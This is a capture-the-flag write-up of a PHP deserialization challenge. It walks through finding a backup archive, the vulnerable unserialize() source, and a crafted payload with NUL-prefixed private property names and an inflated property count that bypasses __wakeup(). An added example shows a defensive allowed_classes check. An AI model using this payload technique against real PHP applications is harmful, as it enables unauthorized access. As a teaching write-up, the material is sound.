Topic: PHP serialization and deserialization; there are a few extension notes at the bottom worth reading.

The hint says the site was backed up, so the first step is a directory scan to find the backed-up source.

dirsearch turned up the www.zip archive.

After unzipping it, the challenge turned out to be about deserialization.

The specifics are as follows:

index.php contains the following code: it takes a GET parameter and passes it straight to unserialize():

<?php
include 'class.php';
$select = $_GET['select'];
$res=unserialize(@$select);
?>

class.php contains the rest of the source (everything lives here):

<?php
include 'flag.php';

error_reporting(0);

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}
?>

Building the payload

Declare a Name class with username and password, both declared private; every part of that description matters for the serialized form.

From the checks in __destruct(), username must be 'admin' and password must be 100, so build the serialized string accordingly.

In the format, O is an object, s is a string and i is an integer.

Because the properties are private, their serialized names are wrapped in NUL bytes (they show up as blanks when echoed), which must be written as %00 in the URL.

Constructed: O:4:"Name":2:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

payload: url+?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

Note the property count in the payload is 3 while only 2 properties are supplied: on the PHP versions this challenge targets, that mismatch causes __wakeup() to be skipped, so username is not reset to 'guest' before __destruct() runs.

Extension and Q&A:

When I looked at other people's payloads I was puzzled: why write the property name as %00Name%00username?

So I tested all three visibility modifiers: public, protected, private.

Then it clicked:

Only public properties can be written as-is in their natural form; private ones need the %00Name%00 prefix,

and protected ones use the %00*%00username form.

Protected properties; the comment at the end of the code shows what running it prints.

<?php
class Name{
	protected $username = 'nonono';//////////////// look at these two lines
	protected $password = 'yesyes';

	public function __construct($username,$password){
		$this->username = $username;
		$this->password = $password;
	}
}

$a = new Name('admin',100);
$b=serialize($a);
echo $b;
// LOOK HERE!!!!!!!!!
// Running this prints: O:4:"Name":2:{s:11:" * username";s:5:"admin";s:11:" * password";i:100;}
// (each blank around the * is a NUL byte, which is why the length is 11)
?>

Public properties; the comment at the end of the code shows what running it prints.

<?php
class Name{
	public $username = 'nonono';
	public $password = 'yesyes';

	public function __construct($username,$password){
		$this->username = $username;
		$this->password = $password;
	}
}

$a = new Name('admin',100);
$b=serialize($a);
echo $b;
// Prints: O:4:"Name":2:{s:8:"username";s:5:"admin";s:8:"password";i:100;}
?>

Private properties; the comment at the end of the code shows what running it prints.

<?php
class Name{
	private $username = 'nonono';
	private $password = 'yesyes';

	public function __construct($username,$password){
		$this->username = $username;
		$this->password = $password;
	}
}

$a = new Name('admin',100);
$b=serialize($a);
echo $b;
// Prints: O:4:"Name":2:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}
// (each blank around Name is a NUL byte, which is why the length is 14 = 1 + 4 + 1 + 8)
?>
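The following is an added example, not code from the original writeup or the challenge: it makes the NUL bytes behind the "blanks" above visible for all three visibilities, shows how urlencode() turns them into the %00 the payload section uses, and then shows the check a defender would put in index.php instead of the raw unserialize() call. The class names (PublicName, ProtectedName, PrivateName) and the safeUnserialize() helper are my own; the property values mirror the challenge.

```php
<?php
// Added example (not part of the original writeup).
// One reduced copy of the challenge's class per visibility; __destruct is left out
// because only the serialized property names are of interest here.
class PublicName    { public    $username = 'admin'; public    $password = 100; }
class ProtectedName { protected $username = 'admin'; protected $password = 100; }
class PrivateName   { private   $username = 'admin'; private   $password = 100; }

// Serialize an object and return the raw string, a version where every NUL byte
// is spelled out as \0, and the URL-encoded form that would go into ?select=.
function showSerialized(object $obj): array {
    $raw = serialize($obj);
    return [
        'raw'     => $raw,
        'visible' => str_replace("\0", '\0', $raw), // the "blanks" in the writeup are \0 bytes
        'url'     => urlencode($raw),               // \0 becomes %00 (quotes become %22 etc.)
    ];
}

foreach ([new PublicName, new ProtectedName, new PrivateName] as $obj) {
    $s = showSerialized($obj);
    echo get_class($obj), ":\n  ", $s['visible'], "\n  ", $s['url'], "\n";
}
// public:    s:8:"username"                    (8 = strlen("username"))
// protected: s:11:"\0*\0username"              (11 = 1 + 1 + 1 + 8)
// private:   s:21:"\0PrivateName\0username"    (21 = 1 + strlen("PrivateName") + 1 + 8)
// For the challenge's class Name the private form is 1 + 4 + 1 + 8 = 14, matching s:14 above.

// Defender side. The challenge's index.php calls unserialize() on $_GET['select']
// with no restrictions, so any loaded class can be instantiated and its
// __wakeup()/__destruct() run on attacker-controlled properties.
// allowed_classes => false keeps the data but never instantiates the named class,
// so no magic method of Name (or any other class) can fire.
function safeUnserialize(string $data) {
    $value = @unserialize($data, ['allowed_classes' => false]);
    if ($value === false && $data !== serialize(false)) {
        return null; // malformed input rather than a serialized `false`
    }
    return $value;
}

$untrusted = serialize(new PrivateName);           // stands in for the ?select= value
$obj = safeUnserialize($untrusted);
var_dump($obj instanceof __PHP_Incomplete_Class);  // bool(true): not rebuilt as PrivateName
var_dump(safeUnserialize('O:4:"Name":3:{broken'));  // NULL: garbage is rejected, not executed
```

Run it with the PHP CLI (php example.php). If the application only needs to round-trip plain data rather than objects, json_encode()/json_decode() avoids the object-instantiation problem entirely and is the simpler fix.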